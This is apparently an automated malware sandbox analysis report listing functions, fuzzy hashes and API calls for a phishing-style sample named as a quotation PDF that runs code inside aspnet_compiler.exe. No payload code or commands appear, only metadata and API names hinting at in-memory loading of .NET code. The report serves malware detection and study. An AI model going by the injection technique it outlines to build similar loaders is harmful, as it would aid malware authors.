Opcode Fuzzy Hash: 988b411fea26a09e8a52b9f269060917f73331543c722fbe9d0ee0588282d023
Instruction Fuzzy Hash: 93E0E630D0D95D89DB14EB10CC552E973A1EF54705F4141F6800EB6595DF786A408E40

Function 00007FF848F4F493 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b670664dcf0410e959c876d18cb890317e9cbb84aeadd1f6895c362e5c8c8d
Instruction ID: c9a0cf2bbdbae5b9b3dae1ca734c49b333e9429523d0350a61c9251397684eac
Opcode Fuzzy Hash: e6b670664dcf0410e959c876d18cb890317e9cbb84aeadd1f6895c362e5c8c8d
Instruction Fuzzy Hash: 9CD09E70C1C55C8EEBA4EB18D844BE8B6F1EF18700F1040EA800DF26C1CA351BC18F14

Function 00007FF848F40BD2 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c73b90aee2afb6c76224d5fb672246032418921fc0450e4289ab58ca790ce9
Instruction ID: 9a14ba25169c7d8d202e0c7eb9173e6bffd52c42f7b85ff3419222b4303486e9
Opcode Fuzzy Hash: 92c73b90aee2afb6c76224d5fb672246032418921fc0450e4289ab58ca790ce9
Instruction Fuzzy Hash: 22A0223A88808CCAEFA02A0038000F83300EB80200F800023EE0EA20808B2222380088

Non-executed Functions

Function 00007FF848F452FA Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2654607630.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff848f40000_QUOTATION_NOVQTRA071244#U00b7PDF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4e61808683e9b88a3365d481e3c667ce9d9a3e257e67e07b770b62a8a7db0a5
Instruction ID: a7008dfb0a4bb30bb962c76513e64b4ba5e55e7f160fac6db1d31110eb67ac72
Opcode Fuzzy Hash: c4e61808683e9b88a3365d481e3c667ce9d9a3e257e67e07b770b62a8a7db0a5
Instruction Fuzzy Hash: 8721C537B1E92E58A324367D78810FE9790FBC127EB04573BD288DD4438D0D548B02E4

Analysis Process: aspnet_compiler.exePID: 6176, Parent PID: 2132COMMON

Execution Graph

Execution Coverage:	19.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	60
Total number of Limit Nodes:	2

Executed Functions

Function 000001F59DD42D9C Relevance: 1.6, APIs: 1, Instructions: 382
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 000001F59DD42E0F

Memory Dump Source

Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
Instruction ID: ee877543d6edb2bb116c3eecf1c9929998ea057cf86e169eba6f0947d170ed33
Opcode Fuzzy Hash: 8a2170de53a62e15b06d68cedc8902e765ed4ca48a6a709c27748450887b43b9
Instruction Fuzzy Hash: 85C1CA30214F06CBEB5DEA68C4A57FAB7D2FF59308F543239D58ACB1C6DB60D8428681

Function 00007FF848FE99B0 Relevance: .3, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81db4d9ae5e9f2dd85cdd5bdc53f4d2e7858a189c22bf25422dd7074759413cb
Instruction ID: 61cb17e88534e7747a6a3e93274096d9511df99cade56f4fb3dbf55202269a2b
Opcode Fuzzy Hash: 81db4d9ae5e9f2dd85cdd5bdc53f4d2e7858a189c22bf25422dd7074759413cb
Instruction Fuzzy Hash: CDB12270D1961D9FDB95EF68C855BECBBF0EF19301F1001AAD049E72A2DB38A981CB15

Function 00007FF848FE9E4D Relevance: .3, Instructions: 273
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0516603e24fb333a61d9669fc9e3076e282916135f0f598fee4c38fbd6d38378
Instruction ID: 637d4b1b103c34c483bce9c8c4c85b7201c1f44609a4da6168a5e10329686f01
Opcode Fuzzy Hash: 0516603e24fb333a61d9669fc9e3076e282916135f0f598fee4c38fbd6d38378
Instruction Fuzzy Hash: 48A12670D09A0A8FEB94EF58C854BE9B7A1FF58340F1046A9D01DE32D2DB38A985CB55

Function 00007FF848FEA151 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b6a5438ce8dae4e6930b0f0299e80c23f251161f4aa0bfdcd13c91ae20f58f
Instruction ID: a207b0f6dca33d68798bca9e12367c22c29cdef5609b9bc10b79d2f77dab2e34
Opcode Fuzzy Hash: c9b6a5438ce8dae4e6930b0f0299e80c23f251161f4aa0bfdcd13c91ae20f58f
Instruction Fuzzy Hash: F9010031D1861A8FEB50EFA5C4407FEB2B1EF95354F108139C128A71D5CB796599CF84

Function 000001F59DD42B66 Relevance: 4.7, APIs: 3, Instructions: 226
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001F59DD42B74
SysAllocString.OLEAUT32 ref: 000001F59DD42C90
SafeArrayDestroy.OLEAUT32 ref: 000001F59DD42D74

Memory Dump Source

Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
Instruction ID: 5aae93d84e4f24af89fc98b15f06b498e62efd817f9e2d9bbb46a8c13a927f52
Opcode Fuzzy Hash: 1e378af6d27dfc507e22e8ba87a9d8664e9aae4a206c1945e061b62da3beb022
Instruction Fuzzy Hash: BC716D30218F09CFDB68EF28C8997A6B7E1FF99305F105629959BCB191DB30E505CB81

Function 000001F59DD445B4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000001F59DD44682

Strings

l, xrefs: 000001F59DD4461C

Memory Dump Source

Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: l
API String ID: 1029625771-2517025534
Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction ID: 61a9df773b53b5ac148ff575d467a0e9a59e6a6d4b407441e8898136c3538674
Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
Instruction Fuzzy Hash: 6331B430518F868FE799DB28C0547B6BBD6FBA931CF2466BCC1CAC7192D7A0D8468701

Function 000001F59DD42B28 Relevance: 1.6, APIs: 1, Instructions: 129
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CLRCreateInstance.MSCOREE ref: 000001F59DD42B74
SysAllocString.OLEAUT32 ref: 000001F59DD42C90
SafeArrayDestroy.OLEAUT32 ref: 000001F59DD42D74

Memory Dump Source

Source File: 00000004.00000002.3318682835.000001F59DD20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F59DD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1f59dd20000_aspnet_compiler.jbxd

Yara matches

Similarity

API ID: AllocArrayCreateDestroyInstanceSafeString
String ID:
API String ID: 815377780-0
Opcode ID: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
Instruction ID: ce26cd8bea8e9accfc76c86ca8b67b2ff18164e07fa7a13e8a09d83f1223ac4f
Opcode Fuzzy Hash: d8270353524c7209e62da373cde049d979e5b9a2e03ad85e1312cb18040becdc
Instruction Fuzzy Hash: BC418D31218F098FD75CEE28D899AF6B7E5FB95318F00562ED58AC7091EB31E5058BC2

Function 00007FF848FE4DA2 Relevance: .3, Instructions: 253
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f094ba2f943aa6c241eb5dbe3a3ef1d2d7b67655451dcca301e77ebf2c168927
Instruction ID: 1cc2c8e03bbe85dd18e32678ca519fea6e315dba2abbc1922c7737a38e5e9300
Opcode Fuzzy Hash: f094ba2f943aa6c241eb5dbe3a3ef1d2d7b67655451dcca301e77ebf2c168927
Instruction Fuzzy Hash: 2B91DB70D08A5C9FDB94EF68C859BA8BBF1FF69301F0441AAD04DE7292DB349885CB41

Function 00007FF848FE3A0C Relevance: .2, Instructions: 241
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba76b163fccd90517b140623544afea676846913d7844254f664fa734784386e
Instruction ID: 7086990f45e81289438d63b6f85e87c9b02d42702594077cee38d7cb7e96c94b
Opcode Fuzzy Hash: ba76b163fccd90517b140623544afea676846913d7844254f664fa734784386e
Instruction Fuzzy Hash: 2F812D70D0CA5C8FDB94EB68C459BA9BBF1FF58300F1041AAD04EE7291CB389985CB15

Function 00007FF848FE31EC Relevance: .2, Instructions: 232
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78e692ff0bca73c2fd7e040e325dedb3ecd145146993e23d6d364907d4ee9032
Instruction ID: dddda91146935d878be2b68137813e3ebf2762d19175763ea0740de484bdf337
Opcode Fuzzy Hash: 78e692ff0bca73c2fd7e040e325dedb3ecd145146993e23d6d364907d4ee9032
Instruction Fuzzy Hash: A5812870909A5C9FDB94EB68C459BA8BBF1FF59300F1041EED04EE7291CB39A985CB05

Function 00007FF848FE4A55 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cbfc2097caf03848f4da0b1190ceb2644dfaee2e0c9000b206cebd2f07af3fb
Instruction ID: a63a62a576716ca68ebca56d9dfb0ec0fef36fc3c17db75bfed36ce73784a189
Opcode Fuzzy Hash: 8cbfc2097caf03848f4da0b1190ceb2644dfaee2e0c9000b206cebd2f07af3fb
Instruction Fuzzy Hash: E2811A70D09A5D8FDB94EB68C459BA8BBF1FF69301F1041AED04EE7291CB389985CB05

Function 00007FF848FE3605 Relevance: .2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b9c3e39723c36eb4c1a381c5cb216d2d904ed74993821e354810ce840e42d26
Instruction ID: 4932314b0142ea766e9932154a260bd345c396fb7753e9c7bae19e26793d7c9e
Opcode Fuzzy Hash: 5b9c3e39723c36eb4c1a381c5cb216d2d904ed74993821e354810ce840e42d26
Instruction Fuzzy Hash: DE812DB090D65D8FDB94EB68C499BA8BBF1FF59300F1041EAD04EE7291CB389985CB05

Function 00007FF848FE0598 Relevance: .2, Instructions: 222
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2b60a7ca4db4d2fc819a5cd1e63bf0e0062924b4c3846f5fdd94c3db3706b7d
Instruction ID: 8b015179c8b97871a9951e76d6176e381a1448fed1cf99075e3a8a0f1591eee7
Opcode Fuzzy Hash: a2b60a7ca4db4d2fc819a5cd1e63bf0e0062924b4c3846f5fdd94c3db3706b7d
Instruction Fuzzy Hash: 77718470A08A1D9FDB94EF68C899BADB7F1FB69301F1041A9D00DE7295DB34A885CB40

Function 00007FF848FE2A17 Relevance: .2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd97997f793fd3dec1b2d706e2cb6202a7e01890bc88854158b37936e357a013
Instruction ID: 2a90e0337605b852453eefb3fd2f6158884b0c2ba842cd940d66ef496799b9e3
Opcode Fuzzy Hash: bd97997f793fd3dec1b2d706e2cb6202a7e01890bc88854158b37936e357a013
Instruction Fuzzy Hash: 9E811A70D18A5D9FDB98EF68C455BA8BBF1FF58300F5041AAD00DE7291DB38A985CB05

Function 00007FF848FE1E72 Relevance: .2, Instructions: 219
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a855db084c72a8497a859336a85703c6f4b82932f78d4922e4def1e9534376f
Instruction ID: c09b46c67072f43c592b2abc7e6b3bf56ceddb1c28557ae3104bac4046466049
Opcode Fuzzy Hash: 0a855db084c72a8497a859336a85703c6f4b82932f78d4922e4def1e9534376f
Instruction Fuzzy Hash: D2717270D0DA8D9FDB95EBA8D455AACBBF0FF59311F0501A9D049E72A2CB389C81CB41

Function 00007FF848FE422C Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06beec6220cf8f90f272972c41ece1c206016af230664debd92ae86d96cd5d60
Instruction ID: 8d67220209807c3e33b44dfe8cc2802addc9cabb28e3344c028031b4975ed9b3
Opcode Fuzzy Hash: 06beec6220cf8f90f272972c41ece1c206016af230664debd92ae86d96cd5d60
Instruction Fuzzy Hash: 7771497090DA5D8FDB94EB688459BB8BBE1FF68300F1001EEC04ED7691CB38A985CB05

Function 00007FF848FE3E25 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90b0eb0fc9f3faafd763ff2ea2c9fce77a8ce9e6f9a7c4bd60707eb1a9f4e237
Instruction ID: d3772b50b22a7dd281e31a70ac7ecf11bebed86b76d7b5aa027f05dcfa65ff12
Opcode Fuzzy Hash: 90b0eb0fc9f3faafd763ff2ea2c9fce77a8ce9e6f9a7c4bd60707eb1a9f4e237
Instruction Fuzzy Hash: 4C71187090DA599FDB98EB68C459BB8BBF1FF58300F1041AED04ED7291CB399985CB05

Function 00007FF848FE4645 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2df72a50469a03dc964b9f8b0482a807f189c7ad4b73df82482b3cfd9cc40e
Instruction ID: 427debfa502ace800198c8c30050c613fbbca7cf8dc8ceef3fa847e9bd28fc86
Opcode Fuzzy Hash: fb2df72a50469a03dc964b9f8b0482a807f189c7ad4b73df82482b3cfd9cc40e
Instruction Fuzzy Hash: C7713970D0DA588FDB94EB68C459BA8BBE1FF69301F5041EED04EE7291CB385985CB05

Function 00007FF848FE52A5 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98be3e867d325dd36b22442e6a83dd2e3701126c60112f5aea48ebc9fd03c242
Instruction ID: f32593779b13a88a755c59a1df5d0596e1dc22444a8e76ecc690c8d594bca3c7
Opcode Fuzzy Hash: 98be3e867d325dd36b22442e6a83dd2e3701126c60112f5aea48ebc9fd03c242
Instruction Fuzzy Hash: 0A51FE319AF24B9FE35173A854FE6FB1650EF8B384F846D7AE90C494D38E8C75044269

Function 00007FF848FEAA54 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e9a540fcdf42d7fe45afa7e2b7e6c1b6b627a025412f11be2db9b3277ea6003
Instruction ID: d5430df4e9b8e6f1b5c296e7c322552f1ddefa0f4282a28d43e439d20073a444
Opcode Fuzzy Hash: 0e9a540fcdf42d7fe45afa7e2b7e6c1b6b627a025412f11be2db9b3277ea6003
Instruction Fuzzy Hash: C5717930C0D61E8FEBA9EB14C845AF9B7B1FF64340F0042B9D41A971D1EB386A89CB54

Function 00007FF848FE3227 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2678d4486fa8f887e66a4ccf352370ca4ef2bd47ab10f80b9a4dba5b4e5ecbd5
Instruction ID: 69d0a2d3e4d6d4ddf9aea1468b2d34bd7c9ed7a58b62c4d2ac0de08817d904d9
Opcode Fuzzy Hash: 2678d4486fa8f887e66a4ccf352370ca4ef2bd47ab10f80b9a4dba5b4e5ecbd5
Instruction Fuzzy Hash: E6512970D0CA5D9FDB98EB688459BB9BBF1FF59300F4001AAD04ED7291CB38A980CB15

Function 00007FF848FE3637 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c76b3eae8444dfab49174e256f5fb0da34e49b55c097cec1368fddf400627e4a
Instruction ID: 295377709f1888d22d38ae6d74f3049788f0d47cc1f021f29fb5fe1a4de19f28
Opcode Fuzzy Hash: c76b3eae8444dfab49174e256f5fb0da34e49b55c097cec1368fddf400627e4a
Instruction Fuzzy Hash: 7E512870D0DA5D9FDB98EB688459BB9BBF1FF59300F5401AAD04DE7291CB38A980CB05

Function 00007FF848FE3A47 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3acf45e2d79b903b72593a6f34d6af86b38e9d3876f8528728aee44971a3703
Instruction ID: d03c7e6872b0bfbae91a1193ac9c71c79d2b483de136f2deeaf90175dc42fc17
Opcode Fuzzy Hash: a3acf45e2d79b903b72593a6f34d6af86b38e9d3876f8528728aee44971a3703
Instruction Fuzzy Hash: DF510870D09A5D9FDB98EB688459BB9BBF1FF59300F4041A9D04ED7291CB38A980CB15

Function 00007FF848FE3E57 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6fc9ed60b3fb43af708b4e3d267d65cb1a05bcede378ae25c7daa7f81786bd2
Instruction ID: 2f9dcbdd26c33eda896fd22d0b4a36b7aba4e5b047ccee4b6c670f56ba668385
Opcode Fuzzy Hash: d6fc9ed60b3fb43af708b4e3d267d65cb1a05bcede378ae25c7daa7f81786bd2
Instruction Fuzzy Hash: 96510670D0CA599FDB98EB688455BB9BBF1FF69301F4001AAD04ED7291CB39A984CB05

Function 00007FF848FE4267 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c198f0991b53c22f5492f89bb22800f7a7441a7565a1eb0ab39fc0d7c2b393
Instruction ID: b0dd5074ac8c0fa3c4ae8754749827394241e77739922769da564e092b217213
Opcode Fuzzy Hash: f4c198f0991b53c22f5492f89bb22800f7a7441a7565a1eb0ab39fc0d7c2b393
Instruction Fuzzy Hash: CC510770D09A599FDB98EB688455BB9BBE1FF69300F5001AED04ED7291CB389980CB15

Function 00007FF848FE4677 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670923b38e2ac39bd8eef82bf8e34d537d11c4674003376cd5738eee32b6c491
Instruction ID: d94c9790527d74a1502897bc5e6c366d401285baacc4e950ce18af063887c956
Opcode Fuzzy Hash: 670923b38e2ac39bd8eef82bf8e34d537d11c4674003376cd5738eee32b6c491
Instruction Fuzzy Hash: B7513770D0DA599FDB98EB688455BB9BBE1FF69300F5001AED04EE3291CB386984CB15

Function 00007FF848FE4A87 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c935e4fe27275133db1370436749ecc0a816d86de780ee91badeb4f23c41b7de
Instruction ID: 4361ae2de006d1eda67a1743f0d95d512f4c25524684858750977d7fe86307c5
Opcode Fuzzy Hash: c935e4fe27275133db1370436749ecc0a816d86de780ee91badeb4f23c41b7de
Instruction Fuzzy Hash: 2F510870D0DA599FDB98EB688455BB9BBF1FF69301F4041AED04DD7292CB386980CB05

Function 00007FF848FE5A09 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a3d9a92cbcb1a86ca321164fb3b750f5bd5da84a1fb03981a8005e950dc64c7
Instruction ID: 49c207d876a0d1d37f52d8a7d72577276ce598ffb36a48826e4ff4467ce6aaa0
Opcode Fuzzy Hash: 6a3d9a92cbcb1a86ca321164fb3b750f5bd5da84a1fb03981a8005e950dc64c7
Instruction Fuzzy Hash: 5F517B30C0D6498FDB55EF64C4596BEBBB1FF0A311F1400A9D00A9B1D2CB3D6846CB59

Function 00007FF848FE0738 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 026db001f2a2d3897a56d29b10152e53d01d63406cf4cb71856035ed217f66a3
Instruction ID: d2de39fd34e57d15023cfa73f9c432518c750b1a9f3b6e8b5850e5addbca128d
Opcode Fuzzy Hash: 026db001f2a2d3897a56d29b10152e53d01d63406cf4cb71856035ed217f66a3
Instruction Fuzzy Hash: 9831E231C0C64A9FE795B768A8661FC7BE0FF95260F05007AD489975D3CE2C28478B65

Function 00007FF848FE5BFB Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3323753138.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff848fe0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6293d6d84644b75f313705cf445d4253d6f1d7f86895fb2d7d48c64a04b7c0f
Instruction ID: 471ddd6ba4149d5dac885d04966d836334a10e984077720f6bdfe15d449a9759
Opcode Fuzzy Hash: c6293d6d84644b75f313705cf445d4253d6f1d7f86895fb2d7d48c64a04b7c0f
Instruction Fuzzy Hash: BD31F03188D68E9FD7029B789C186F97BE8EF8A220F0401B7D048CB0D2D72C599AC765

Function 00007FF848FE0740 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

